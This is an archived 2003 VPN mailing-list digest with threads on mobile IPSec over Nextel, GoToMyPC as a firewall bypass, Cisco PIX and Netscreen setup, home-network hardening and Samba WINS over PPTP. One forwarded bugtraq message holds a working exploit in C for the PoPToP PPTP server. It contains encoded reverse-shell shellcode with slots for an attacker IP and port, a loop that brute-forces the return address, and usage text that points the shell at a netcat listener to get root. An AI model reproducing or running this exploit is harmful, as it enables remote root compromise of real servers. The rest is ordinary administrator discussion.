Corporativa (591) 2-2313030 ext 2021 (591) 72029832 --__--__-- Message: 7 Date: Wed, 16 Apr 2003 12:49:44 -0700 (PDT) From: Jac Subject: RE: [VPN] IPSEC or PPTP over Nextel Packetstream Gold To: Jim Atherton , "'hakan.palm at generic.se'" Cc: vpn at lists.shmoo.com Are you stuck with the VPN 3000? My understanding Nextel is currently testing Nortel Contivity platform for their mobile VPN offering. Should be available in Q4. I know they have a wireless IPSec client that may give you the solution you need. Maybe you can ask about that and see what they are offering. Jac --- Jim Atherton wrote: > Guess I need to be a little more clear. We use the > VPN 3000 concentrator. I > have a laptop. I need to connect to my work > environment with my laptop over > some mobile (moving) method. I have the VPN 3000 > software client on my PC > and Windows 2000 PPTP (which the VPN 3000 also will > allow as a client). I > have a Nextel phone. I noticed that Nextel has a > mobile connectivity > solution (Packetstream gold) and tried about 6 > months ago to make it work. > It didn't. There is an old thread somewhere on this > server that states that > Motorola's compression hardware used by Nextel did > not support IPSEC > compression (this was during the summer of 2002) but > that it would in late > 2002. I am trying to find info about whether or not > it does now (Nextel has > no clue and noone at Nextel (that I can reach) knows > anything about the > technical details of this product Packetstream Gold. > Also would accept > alternative cost effective methods (have to approach > at least 28.8 speeds). > This is an interesting area that noone seems to have > a clue about. Since my > company resells various VPN solutions nationwide, I > have a feeling at least > of the potential for this as a product and am a > little surprised that noone > has filled this gap. > > -----Original Message----- > From: hakan.palm at generic.se > [mailto:hakan.palm at generic.se] > Sent: Tuesday, April 15, 2003 5:08 PM > To: jim.atherton at netifice.com > Cc: vpn at lists.shmoo.com > Subject: Ang: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > > Jim, > > are you trying to connect to a Cisco VPN 3002 > Hardware > Client with another client? > If so, the simple answer is as far as I know, no you > can not > terminate the VPN tunnel from another client like > the Cisco > VPN Client at the VPN 3002. Simply because the Cisco > VPN 3002 is a hardware client and not a > concentrator. > > For a mobile solution the VPN 3000 Concentrator > range i > IMNHO really nice to work with and well suited. You > can > use the Cisco VPN Client on a laptop running all but > the > archaic versions of Windows, Mac OS X, Linux... > There are > 3rd party support for older Mac OS, Symbian, Pocket > PC > and PalmOS. > > HTH > > Regards, > /Palm > > > > > jim.atherton at netifice.com > 2003-04-15 20:35 > > Till: vpn at lists.shmoo.com @ INTERNET > Kopia: (Blank: Hakan Palm/Generic) > ?rende: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > I need a mobile connectivity solution that supports > either (I would like > both and prefer IPSEC) IPSEC (Specifically Cisco VPN > client 3.5.x or later) > or PPTP (via Windows 2000 native PPTP). I need to > connect to a Cisco VPN > 3000 hardware client. I looked into this last year > and actually tested with > Nextel and neither worked and the guys at Nextel > didn't know why. I ran > across an old mail archive here that said that the > compression used by > Nextel Packetstream Gold used a compression > technology that precluded use of > IPSEC and that this would change sometime in the > last quarter of 2002. Does > anyone have any info about the current or near term > status of this product? > My company sells a set of VPN products and services > and a useful mobile > wireless VPN solution is needed. Before Richocet > crashed we did some stuff > with them. But since then we have had no wireless > mobile solution. If there > are any other cost effective mobile wireless > solutions out there I would > like to know. Personally, I need connectivity via my > laptop and a can accept > speeds of around 28.8 (true speed) but would like > higher speeds. Lower, more > expensive solutions are not currently acceptable. I > cannot for instance use > some sort of high speed satellite connection due to > cost. > > Thanks for any info. > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn __________________________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo http://search.yahoo.com --__--__-- Message: 8 From: "safieradam" To: Subject: Re: [VPN] Clientless VPN Date: Wed, 16 Apr 2003 17:16:23 -0400 Corrections: "URL content filtering" was meant to be "URL scanning and web page content filtering". i.e. block encrypted web page content. "At least our firewall policy needs review" was supposed to be "At least _your_ firewall policy needs review". RG pointed out that there was a thread on the topic a while back. My quick review shows that the common solution was to block the GoToMyPC servers. While that may work for now because the GoToMyPC folks are nice enough to maintain a single server farm, it leaves a network open to variations / competitors, like http://www.htthost.com. Hackers have used tunneling for a long time so it's not just web pages and http. The only real solution I see is to prohibit encrypted application content in high level policy and actually block encrypted application content in your perimiter defense or proxy server. Adds a nice bit of overhead. At least content filtering is not a new concept and vendors exist. Adam Safier ----- Original Message ----- From: "safieradam" To: Sent: Wednesday, April 16, 2003 12:10 PM Subject: [VPN] Clientless VPN > I'm raising the specter of clientless VPN again because I came across this > service which seems to meet the requirements: > > I do consider this a form of VPN. They may only be transmitting the screen > image, essentially pcAnywhere like, but the functionality of getting the > work done is there. > > They download the client as a java app so the user does not need to do > special installation. Instead, it keeps polling a service server so the > initial connection is outbound. > > Despite my security issues with it this is very attractive. Even has PDA, > Mac and Unix support.... > > https://www.gotomypc.com > > Security issues: > > Password user authentication only. I assume this will change as the service > evolves. On the positive side, they do seem to use digital signatures on the > target - " multiple passwords, including an access code that resides on the > host computer and is never transmitted or stored on GoToMyPC servers ". > > They advertise/encourage using Kiosk PC's for the client. If you are using > someone else's PC you cannot be sure key-stroke/screen/memory logging is not > going on so your personal passwords could be captured. A PC/PDA you control > is better as long as you didn't execute some malware along the line. > > - You trust the service / software. You are downloading their Java applet, > which could change anytime. You are essentially trusting them to encrypt > the link from the client to the host and not peek. Well, the company trusts > the VPN admin for the company VPN so if you have a contract with GoTo... > That is what security is all about - who do you trust and for what? > > - Can bypasses firewall. At least our firewall policy needs review and th is > could be a headache. Both the client and the "target" initiate outbound > connections to a third party service. If you company policy allows outbound > surfing to just about any address your users could set this up to or from > their office PC without your knowledge. You may need to implement IP and > DNS name filtering for outbound traffic. That will only work if GoToMyPC > play nice and don't get into rotating names and addresses or sell the server > part to companies that use their own IP addresses to set up a corporate > service. URL content filtering on outbound traffic might work. > > - Does the phrase below mean that if your policy is to disabled all > downloading on the users PC GoToMyPC launch their own program that ignores > the browser and downloads and runs a Java app? > " For a user who connects to the host computer via a client with a Mac or > Unix operating system (or from a Windows-based client that does not accept > downloadable files), the Java-enabled Universal Viewer launches > automatically. There is nothing the user needs to do to select the > appropriate Viewer - our technology will automatically detect the client > computer's operating system and launch the appropriate Viewer. " > > Any other holes I missed? > > I see a review of many companies policies coming up. > > Adam Safier > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > --__--__-- _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn End of VPN Digest -------------- next part -------------- A non-text attachment was scrubbed... Name: Greg Owens Jr (greg.l.owens at verizon.net).vcf Type: text/x-vcard Size: 245 bytes Desc: not available Url : http://lists.shmoo.com/pipermail/vpn/attachments/20030417/dd80c945/attachment.vcf From nirving at casinoreality.com Thu Apr 17 11:04:38 2003 From: nirving at casinoreality.com (Nicholas Irving) Date: Thu, 17 Apr 2003 16:04:38 +0100 Subject: [VPN] Slightly off topic - pix and internal port redirection Message-ID: <573C58707068514CA8F542BFB519B8DE727E@dzobdc.dzo.com> Subject: Slightly off topic - pix and internal port redirection Hi all, Please shout @ me if this is not allowed - I normally post under nirving at exaol.com, but this is a little broken @ present. I am wondering if anybody has successfully shutdown a pix firewall and redirected traffic to a number of proxies. I would like to redirect any http requests to a squid proxy server and any smtp requests to our exchange server. I can find out how to do port mapping on the external interface but not the internal interface. Thanks Nicholas Irving nirving at casinoreality.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030417/1c1768f2/attachment.htm From safieradam at hotmail.com Thu Apr 17 16:10:43 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 17 Apr 2003 16:10:43 -0400 Subject: [VPN] Clientless VPN (apologies for the cross-post) References: Message-ID: No, I am not advocating blocking all encrypted traffic. I strongly disagree with the brain-dead French government that outlawed strong encryption several years back. I am a big fan of VPN's, including VPN between the client and the application host. Personally, I want SSL connections to web sites that ask for any type of registration information or have private data. I'm also very interested in data-tagging, the encryption of portions of a document so only certain people can access that portion. All of these are great as long as you are managing them, they are under your control and fit within your security policy. The issue is one of policy enforcement points and monitoring of "general" traffic. Many organizations want to check for viruses in incoming traffic before it reaches the end user. Some also do content filtering on outbound and inbound traffic in an attempt to control sharing of secrets. They usually have security layers of firewalls and IDS systems. Host IDS, firewalls, virus scanning and other security measures add overhead and the available systems are just starting to emerge. Please give me a pointer to a product that can apply content scanning per company policy to outbound sMime e-mail _on_the_user's_PC_. Perimeter checkpoints are the most widely implemented method for dealing with Internet security while the tools to put a police team in everyone's home are still developing. True, the GoToMyPC system primarily transmits screens and play nice by having a fixed server name (now). But it also has a print and file transfer capability. If a user connects to their home PC via an encrypted link and then surfs from there to xxx.hacz.com they have bypassed security controls that are not loaded directly on the office PC. If the user is at home and connects to his office PC the screens (i.e. data) can be captured and forwarded, bypassing content filtering the company may have implemented. What about competitors that may not be as nice or allow connecting directly host to host? Hackers have been encrypting back door connections for years. The ones we've caught usually used fixed ports and identifiable traffic patterns. If everyone is suddenly running encrypted traffic over port 80, or other ports for that matter, identifying malware becomes an even bigger hassle than it is today. What I am saying, in my roundabout way, is that as host to host VPN technology becomes trivial to load and implement, security policy has to be reviewed and security architecture questioned. Do you keep buying IDS and firewalls or do you reduce the costs of labor intensive network IDS monitoring and focus on (labor intensive) end user PC and host IDS monitoring? What will the transition entail and how long will it take? In the mean time, you may wish to do a risk assessment and ban/block encrypted traffic on certain parts of your organization's network. Which parts and which users depends on your security stance and policy. Adam Safier ----- Original Message ----- From: "Evans, TJ (BearingPoint)" To: ; Cc: "safieradam" Sent: Thursday, April 17, 2003 6:35 AM Subject: [VPN] Clientless VPN (apologies for the cross-post) > If I read your statement(s) correctly - > You recommend blocking all encrypted traffic? > > IMHO - This leaves a few problems unsolved, and creates many new ones! > > Unsolved: > Unencrypted, although possibly still tunneled, traffic. > (ICMP tunnels, remote command prompt (e.g - NetCat), etc. > etc.) > > Newly Created: > You would block all SSL'ified websites? > Block all encrypted mail? > Etc. > > Don't get me wrong - there are ways to mitigate the new problems, but my > concern would be that I think this would send the wrong message to your > employees ... and discourage (prevent?) them from following good practices > (encrypting important client emails, only logging into sites that make use > of SSL, etc.). > > Naturally - the real-world / business needs of your employees may permit > such an approach ... but I think this would lean too far to one side of the > "security vs. functionality/usability" scale for most. > > > > Thanks! > TJ > From garrettsinfield at hotmail.com Fri Apr 18 00:51:47 2003 From: garrettsinfield at hotmail.com (Garrett Sinfield) Date: Fri, 18 Apr 2003 04:51:47 +0000 Subject: [VPN] Network Design for security. Message-ID: Hello. Recently my network was hacked, and I'm planning on rebuilding my network (they hacked an outdated ftp server that I was unaware was running). I'm not sure if this should really be going on this mailing list, but I was wondering if anyone would know a decent network design that would implement great security. My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to upgrade IOS) linksys router (four port). A laptop running slackware, a box running win98, and two other boxes running linux (one box is in a serious need for an upgrade, but I don't have the funds to do it yet). My one box has three NIC cards in it as well, so it could be used as a router. I was just curious if anyone has a good idea for a network design that I could implement for maximum security. I'm currently somewhat clueless when it comes to networks. I'd also like to know where I should be placing the VPN, and wether or not I should be using PoPToP or FreeS/WAN. Any ideas or comments would be appreciated! Thanks Garrett Sinfield. _________________________________________________________________ Add photos to your messages with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail From avpnsmith at hotmail.com Fri Apr 18 10:15:06 2003 From: avpnsmith at hotmail.com (avpn smith) Date: Fri, 18 Apr 2003 14:15:06 +0000 Subject: [VPN] Netscreen 10 - VPN tunnel drops Message-ID: Hey all, I setup a VPN between Netscreen-10 and Checkpoint (remote gateway). After I reset the Netscreen equipment I am able to connect to the remote gateway and other m/cs on that network. But it looks like the tunnel is dropped after a while. I then have to reset Netscreen-10. Any ideas on how I could maintain the VPN for longer periods. I am a newbie in firewall setup, so any help will be appreciated. Here are some details after it drops/timesout. ns10-> get vpn Name Gateway RPlay Proposals Monitor Use Count --------------- --------------- ----- --------------- ------- --------- my-vpn my-gw-v2 Yes my-p2 inactive 1 Total VPN Auto: 1 Name Local SPI Remote SPI Algorithm Monitor ns10-> get ike p2-proposal my-p2 Id Name Grp Protocol Enc_alg Auth_alg Lifetime Lifesize -- --------------- --- -------- ------- -------- ---------- ---------- 8 my-p2 0 ESP 3DES MD5 3600 0 ns10-> ns10-> get ike p1-proposal my-p1 Id Name Auth Grp ESP-e ESP-a Lifetime -- --------------- -------- --- ----- ----- ---------- 8 my-p1 Preshare 2 3DES MD5 7200 regards -as _________________________________________________________________ Tired of spam? Get advanced junk mail protection with MSN 8. http://join.msn.com/?page=features/junkmail From jacob at excaliburfilms.com Fri Apr 18 18:05:55 2003 From: jacob at excaliburfilms.com (Jacob) Date: Fri, 18 Apr 2003 15:05:55 -0700 Subject: [VPN] Network Design for security. Message-ID: <5.2.0.9.2.20030418150541.02b3be88@mail1.excaliburfilms.com> Scan your network for any open ports. See if anything else is running you are unaware of. Any free port scanner would work. I use LanGuard Network Scanner. Complex passwords. 7 or more characters long. Use characters like: !@#$%^&() Firewall. Zone Alarm. Or you can create on with that linux box. I do not know how to do that, but it has because discussed on many lists. That would be three places I would start. At 04:51 AM 4/18/2003 +0000, you wrote: >Hello. Recently my network was hacked, and I'm planning on rebuilding my >network (they hacked an outdated ftp server that I was unaware was >running). I'm not sure if this should really be going on this mailing >list, but I was wondering if anyone would know a decent network design >that would implement great security. > >My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon to >upgrade IOS) linksys router (four port). A laptop running slackware, a box >running win98, and two other boxes running linux (one box is in a serious >need for an upgrade, but I don't have the funds to do it yet). My one box >has three NIC cards in it as well, so it could be used as a router. > >I was just curious if anyone has a good idea for a network design that I >could implement for maximum security. I'm currently somewhat clueless when >it comes to networks. I'd also like to know where I should be placing the >VPN, and wether or not I should be using PoPToP or FreeS/WAN. > >Any ideas or comments would be appreciated! > >Thanks > >Garrett Sinfield. > > > > > > > >_________________________________________________________________ >Add photos to your messages with MSN 8. Get 2 months FREE*. >http://join.msn.com/?page=features/featuredemail > >_______________________________________________ >VPN mailing list >VPN at lists.shmoo.com >http://lists.shmoo.com/mailman/listinfo/vpn From tbird at precision-guesswork.com Fri Apr 18 21:19:47 2003 From: tbird at precision-guesswork.com (Tina Bird) Date: Sat, 19 Apr 2003 01:19:47 +0000 (GMT) Subject: [VPN] Exploit for PoPToP PPTP server (fwd) Message-ID: <20030419011936.J85957-100000@sisyphus.iocaine.com> Vulnerability for PPTP server... ---------- Forwarded message ---------- Date: Fri, 18 Apr 2003 18:27:58 +0400 From: "einstein, dhtm" Reply-To: "einstein, dhtm" To: "bugtraq at securityfocus.com" Subject: Exploit for PoPToP PPTP server hello bugtraq, Here is an exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409. The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successfull run it brings up a reverse shell with privileges of the pptpd daemon (typically root) on the victim server. Have fun, einstein, dH team einstein_dhtm at front.ru P.S. Greets to ERRor, Death and all others. Exploit code (compiles on win32): ---------------- Cut --------------------- #include #include #include #define u_int8_t char #define u_int16_t WORD #define u_int32_t DWORD char shellcode[] = "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b" "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a" "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d" "\x01\x01" // port "\x54\xd6\x63" "\x01\x01\x01\x01" // ip address "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67" "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e" "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b" "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60" "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa" "\xfd\xbc\xe0\xfb"; struct pptp_header { u_int16_t length; /* pptp message length incl header */ u_int16_t pptp_type; /* pptp message type */ u_int32_t magic; /* magic cookie */ u_int16_t ctrl_type; /* control message type */ u_int16_t reserved0; /* reserved */ }; #define MAX_HOSTNAME_SIZE 64 #define MAX_VENDOR_SIZE 64 #define PPTP_VERSION 0x0100 struct pptp_start_ctrl_conn_rqst { struct pptp_header header; /* pptp header */ u_int16_t version; /* pptp protocol version */ u_int16_t reserved1; /* reserved */ u_int32_t framing_cap; /* framing capabilities */ u_int32_t bearer_cap; /* bearer capabilities */ u_int16_t max_channels; /* maximum channels */ u_int16_t firmware_rev; /* firmware revision */ u_int8_t hostname[MAX_HOSTNAME_SIZE]; /* hostname */ u_int8_t vendor[MAX_VENDOR_SIZE]; /* vendor */ }; struct pptp_echo_rqst { struct pptp_header header; /* header */ u_int32_t identifier; /* value to match rply with rqst */ char buf[10000]; }; struct pptp_reply { struct pptp_header header; /* header */ char buf[10000]; }; /* Magic Cookie */ #define PPTP_MAGIC_COOKIE 0x1a2b3c4d /* Message types */ #define PPTP_CTRL_MESSAGE 1 /* Control Connection Management */ #define START_CTRL_CONN_RQST 1 #define START_CTRL_CONN_RPLY 2 #define STOP_CTRL_CONN_RQST 3 #define STOP_CTRL_CONN_RPLY 4 #define ECHO_RQST 5 #define ECHO_RPLY 6 // brute force values #define TOPOFSTACK 0xbfffffff #define BOTTOMOFSTACK 0xbf000000 #define STEP 50 void send_init_request(SOCKET st) { pptp_start_ctrl_conn_rqst request; request.header.magic = htonl(PPTP_MAGIC_COOKIE); request.header.pptp_type = htons(PPTP_CTRL_MESSAGE); request.header.ctrl_type = htons(START_CTRL_CONN_RQST); request.version = PPTP_VERSION; request.framing_cap = 0; request.bearer_cap = 0; request.max_channels = 1; request.firmware_rev = 0; strcpy(request.hostname,"hell"); strcpy(request.vendor,"domain HELL"); request.header.length = ntohs(sizeof(request)); send(st,(char*)&request,sizeof(request),0); } void send_ping_overflow(SOCKET st,DWORD ret,char* hostname,short port) { pptp_echo_rqst ping; ping.header.magic = htonl(PPTP_MAGIC_COOKIE); ping.header.pptp_type = htons(PPTP_CTRL_MESSAGE); ping.header.ctrl_type = htons(ECHO_RQST); ping.identifier = 111; ping.header.length = ntohs(1); strcpy(ping.buf,""); int buflen = 500; for (int i=0;i [] [] []\n\n",argv[0]); printf(" is the ip address or hostname of the PoPToP server\n"); printf(" you want to attack. Port 1723 is used for connection\n"); printf(" and - specify an ip address to which\n"); printf(" a connection is possible to port and set up a\n"); printf(" netcat listener. You'll get a reverse shell.\n"); printf(" is a delay between stack bruteforce attemts, in milliseconds\n"); printf(" If you only pass a single parameter, the program will check\n"); printf(" whether remote server is vulnerable or not. Otherwise it will\n"); printf(" perform a ret bruteforce.\n"); printf("usage examples:\n"); printf(" %s 192.168.1.2 192.168.1.1 5555\n",argv[0]); printf(" attack 192.168.1.2 and get a reverse shell on port 5555\n"); printf(" %s 127.0.0.1 127.0.0.1 6666 100\n",argv[0]); printf(" attack a locally running pptpd with a timeout of 100 ms\n"); printf(" and get a shell on port 6666.\n"); printf(" %s 192.168.1.56\n",argv[0]); printf(" check if the PoPToP server on 192.168.1.56 is vulnerable.\n"); return 0; } int timeout = 500; if (argc >= 5) timeout = atoi(argv[4]); // init winsock WORD version=0x0101; WSADATA data; WSAStartup(version,&data); DWORD ret; if (argc == 2) { if (!connect_server(argv[1])) return 1; printf("\nChecking if the server is vulnerable..\n"); printf("(if it is you have to wait 65 seconds)..\n"); send_init_request(st); ret = 0x01010101; int bytes; pptp_reply reply; //header length bytes = recv(st,(char*)&reply,2,0); bytes = ntohs(reply.header.length); bytes = recv(st,(char*)&reply+2,bytes-2,0); int j = htons(reply.header.ctrl_type); send_ping_overflow(st,ret,"0.0.0.0",0); //header length bytes = recv(st,(char*)&reply,2,0); printf("PoPToP server is "); if (bytes != SOCKET_ERROR) printf("vulnerable!\n"); else printf("not vulnerable\n"); closesocket(st); return 1; } printf("[!] Attempting bruteforce against %s\n",argv[1]); printf("interrupt when you get a shell to %s on port %d...\n\n",argv[2],atoi(argv[3])); int checked = 0; for (ret = TOPOFSTACK; ret >=BOTTOMOFSTACK; ret -= STEP) { printf("[*] "); if (!connect_server(argv[1])) return 1; printf("[ret=0x%x]..",ret); printf("sending payload.."); // initial packet send_init_request(st); //a real overflowing ping packet send_ping_overflow(st,ret,argv[2],atoi(argv[3])); closesocket(st); Sleep(timeout); printf("done\n"); } return 0; } From losttoy2000 at yahoo.co.uk Sat Apr 19 02:01:48 2003 From: losttoy2000 at yahoo.co.uk (=?iso-8859-1?q?Siddhartha=20Jain?=) Date: Sat, 19 Apr 2003 07:01:48 +0100 (BST) Subject: [VPN] Network Design for security. In-Reply-To: Message-ID: <20030419060148.89613.qmail@web12706.mail.yahoo.com> Hi Garrett, Without going in too much detail, there are a few things you need to do: 1. Put a firewall (an old pentium with openbsd is an excellent choice or buy a PIX 501) on your internet connection and allow access to only those ports/IPs that absolutely must be accessed from outside world. If your network is only accessed from fixed networks then define "from" IP address also. If you don't have any public access servers then you don't need to allow any incoming connections. 2. Check all the services your services are running and ensure they are bare minimum as required. Audit each service for security vulnerabilities. 3. Occasionally, dialup from one of the computers that are not your home network and scan your IP address range for list of open ports. 4. Use a good tool like Nessus (www.nessus.org) for scanning your applications for vulnerabilities. 5. Update apps like IE which can allow a malicious web site to take over your PC. IMHO, this should take care of 95% of the crackers who are nothing but script kiddies. The chances of a real hacker hitting your network is very less unless you happen to be Bush, Chirac or some super secret intelligence service. :-) As an after-thought, you may consider employing me ;-) Regards, Siddhartha CISSP --- Garrett Sinfield wrote: > Hello. Recently my network was hacked, and I'm > planning on rebuilding my > network (they hacked an outdated ftp server that I > was unaware was > running). I'm not sure if this should really be > going on this mailing > list, but I was wondering if anyone would know a > decent network design > that would implement great security. > > My home LAN currently consists of a cisco 2507 > router (11.2 IOS, soon to > upgrade IOS) linksys router (four port). A laptop > running slackware, a box > running win98, and two other boxes running linux > (one box is in a serious > need for an upgrade, but I don't have the funds to > do it yet). My one box > has three NIC cards in it as well, so it could be > used as a router. > > I was just curious if anyone has a good idea for a > network design that I > could implement for maximum security. I'm currently > somewhat clueless when > it comes to networks. I'd also like to know where I > should be placing the > VPN, and wether or not I should be using PoPToP or > FreeS/WAN. > > Any ideas or comments would be appreciated! > > Thanks > > Garrett Sinfield. > > > > > > > > _________________________________________________________________ > Add photos to your messages with MSN 8. Get 2 months > FREE*. > http://join.msn.com/?page=features/featuredemail > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn __________________________________________________ Yahoo! Plus For a better Internet experience http://www.yahoo.co.uk/btoffer From jmondaca at entelsa.entelnet.bo Thu Apr 24 12:20:16 2003 From: jmondaca at entelsa.entelnet.bo (jmondaca at entelsa.entelnet.bo) Date: Thu, 24 Apr 2003 12:20:16 -0400 Subject: [VPN] Complete VPN access to all PIX interfaces Message-ID: I have a PIX 6.2 with 6 interfaces and VPN client 3.0. I have configured the firewall to permit a VPN connection using the following conf access-list 100 permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0 nat (dmz2) 0 access-list 100 sysopt connection permit-ipsec crypto ipsec transform-set myset esp-3des esmp-md5-hamc crypto dynamic-map dynmap 30 set transform-set myset crypto map newmap 20 ipsec-isakmp dynamic dynmap crypto map newmap interface outside * and the configuration of the vpngroup and isakmp The problem is that I only want the vpn client access my x.x.x.x network in dmz2 but the VPN client can access all the computers in the internal, dmz1, dmz3, etc (all the interfaces). Thanks in advance. _______________________________________ Jorge Mondaca Gerencia Seguridad Corporativa (591) 2-2313030 ext 2021 (591) 72029832 From mferguson at pcsystems-okc.com Thu Apr 24 18:17:13 2003 From: mferguson at pcsystems-okc.com (Marc Ferguson) Date: Thu, 24 Apr 2003 17:17:13 -0500 Subject: [VPN] Connecting a Cisco VPN client to a Symantec/Raptor appliance Message-ID: <2FC8B6E691F86149843719FD4BFDD5BA21C240@pcsmail.pcs.com> Has anyone had any luck using the Cisco client to connect to a Symantec/Axent Raptor box? I have external business partners that are required to run the Cisco VPN client that I need to give access to network resources through my Symantec Gateway Security Appliance and the two clients will not reside on the same PC. Symantec support can only tell me that it should work. Thanks. Marc Ferguson Sales Manager Ridco Inc. DBA PC Systems 3908 N. Tulsa Ave. Oklahoma City, OK. 73112 (405)495-6111 (405)516-2208 mferguson at pcsystems-okc.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030424/362bf8d4/attachment.htm From scottn at s2s.ltd.uk Fri Apr 25 05:25:36 2003 From: scottn at s2s.ltd.uk (Scott Nursten) Date: Fri, 25 Apr 2003 10:25:36 +0100 Subject: [VPN] Complete VPN access to all PIX interfaces In-Reply-To: Message-ID: Jorge, This is easily solved. One solution is, on your other interfaces, do the following: access-list dmz3 deny ip z.z.z.z 255.255.255.0 y.y.y.y 255.255.255.0 access-list dmz3 permit ip any any access-group dmz3 in interface dmz3 Another solution would be to match interesting traffic on your dynamic-map: access-list DYNCRYPTO permit ip x.x.x.x 255.255.255.0 y.y.y.y 255.255.255.0 crypto dynamic-map dynmap 30 match address DYNCRYPTO It is a good idea to have a separate acl for this as you may want to have disparate nat 0 and crypto acl's. Option one blocks traffic going to y.y.y.y _before_ it enters this pix - ie. As it hits the interface. Option two blocks traffic _before_ it enters the tunnel, ie _after_ it's "entered" the firewall ASA. Hope this helps. -- Scott Nursten ------------------- S2S Consultants http://s2s.ltd.uk scottn at s2s.ltd.uk Tel: 0870 350 4525 Fax: 0870 350 4526 ------------------- From carnt at intellissence.com Fri Apr 25 20:31:46 2003 From: carnt at intellissence.com (Carlos Arnt) Date: Sat, 26 Apr 2003 09:31:46 +0900 Subject: [VPN] PPTP and Samba Wins. Message-ID: <002901c30b8b$38ba77d0$0901a8c0@carlosa> Please I really need a large help here, or maybe will be fired :( I have 2 points connected over PPTPd (Using linux redhat 7.3) One is with a server (pptpd) the other with the client (pptp) In the server side i have the network 192.168.10.x in the client side i have the network 192.168.33.x Both have Windows 98 computers connected's. After close the conections both network machines from both side can ping and use applications like "VNC" etc from each other and also use netmeeting etc. Full operations. Now my boss want use netbios to call each machines and also see the diferent workgroups in his network neightborhood options. Like this . Opening the Network neightb he will see Workgroup A and B Selecting one or other he can see the machines from both networks inside A or B workgroups.. For that I use Samba with his Wins option. In the network 192.168.10.x i put the Samba with wins in server mode . In the other 192.168.33.x i just point the other Samba to the wins server in the 192.168.10.x network using like a proxy . Well I can see both workgroups in my network neightborhood, but when click in the workgroup i can't see the machines from the other network just mine :(. Whats happend ? I try everything and none :"( In the client side I use (Iptables) in the server side the ipchains. But i think if I'm under VPN my ports is all clean to the traffic and packets pass. Can anyone help here ? Thanks !! Carlos. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030426/6416a15c/attachment.htm From cipherbk at yahoo.com Sun Apr 27 00:30:11 2003 From: cipherbk at yahoo.com (cipherbk) Date: Sat, 26 Apr 2003 21:30:11 -0700 (PDT) Subject: [VPN] Network Design for security. In-Reply-To: Message-ID: <20030427043011.69997.qmail@web12804.mail.yahoo.com> I've had great success setting up a box running OpenBSD or FreeBSD, configuring it as a firewall running IPF(ilter) and disabling all non-essential services (much easier than with linux, btw). This firewall box also handles NAT functionality for an internal network. Recently, OpenBSD's PF (packet filter) has been made available for FreeBSD 5.0, and is a step above IPF. If the Cisco is your gateway to the Internet, I'd configure the network in this manner: [2507] -- [BSD firewall] -- [Linksys] -- [Internal LAN nodes] You'll need two NICs for the firewall, and a third if you want to run a DMZ, i.e. if you want to run a server outside of your LAN; although this significantly increases the complexity of the firewall configuration. An alternative is to use the NAT capability to redirect ports to a server in your LAN, which provides better security overall and is easier to implement. This would allow you to put the VPN gateway of your choice behind the firewall. You can also configure the firewall to be a VPN gateway as well. You can use that old box of moderate capability just fine, no need to upgrade it. That is, unless you plan on running the VPN on it; in that case, you should beef it up a bit. All the more reason to run the VPN on a linux (or BSD or even Windows) box behind the firewall and just redirect a port to it. After you get your firewall configured (yes, you'll have to read documentation and learn how to make and tweak rulesets), you should install Nmap to scan it for open ports. You can go to http://crypto.yashy.com and scroll to the bottom and there's a self-scan option that uses Nmap to scan your firewall. If you were strictly a Windows user, ZoneAlarm would be the most convenient solution. But, since you mentioned that you run linux, dedicating an old box for firewall duty running OpenBSD or FreeBSD would be the most secure solution without spending any cash on expensive hardware firewalls, much more flexible and just as (if not more) secure. If you want to read up on BSD beforehand, check out http://bsdvault.net which has lots of links and tutorials... You should also look at the NSA guide for securing Cisco routers and harden it up... It's long, but has good info. Google for it. Good luck. --- Garrett Sinfield wrote: > Hello. Recently my network was hacked, and I'm planning on rebuilding > my > network (they hacked an outdated ftp server that I was unaware was > running). I'm not sure if this should really be going on this mailing > list, but I was wondering if anyone would know a decent network > design > that would implement great security. > > My home LAN currently consists of a cisco 2507 router (11.2 IOS, soon > to > upgrade IOS) linksys router (four port). A laptop running slackware, > a box > running win98, and two other boxes running linux (one box is in a > serious > need for an upgrade, but I don't have the funds to do it yet). My one > box > has three NIC cards in it as well, so it could be used as a router. > > I was just curious if anyone has a good idea for a network design > that I > could implement for maximum security. I'm currently somewhat clueless > when > it comes to networks. I'd also like to know where I should be placing > the > VPN, and wether or not I should be using PoPToP or FreeS/WAN. > > Any ideas or comments would be appreciated! > > Thanks > > 